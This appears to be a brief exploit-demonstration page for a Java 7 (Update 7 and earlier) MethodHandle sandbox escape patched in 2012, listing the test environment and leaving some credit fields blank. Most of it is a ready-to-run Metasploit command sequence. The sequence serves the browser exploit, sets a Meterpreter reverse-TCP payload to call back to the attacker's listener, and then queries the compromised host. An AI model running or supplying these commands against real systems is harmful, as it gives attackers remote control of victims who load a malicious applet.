Vulnerability patched by Oracle in 2012 October CPU
Metasploit PoC provided the 2013-01-22
PoC provided by :
Affected version(s) :
Oracle Java version 7 Update 7 and earlier.
Tested on Windows 8 Pro with :
Internet Explorer 10
Oracle Java 7 Update 7
This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.
use exploit/multi/browser/java_jre17_method_handle set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit getuid sysinfo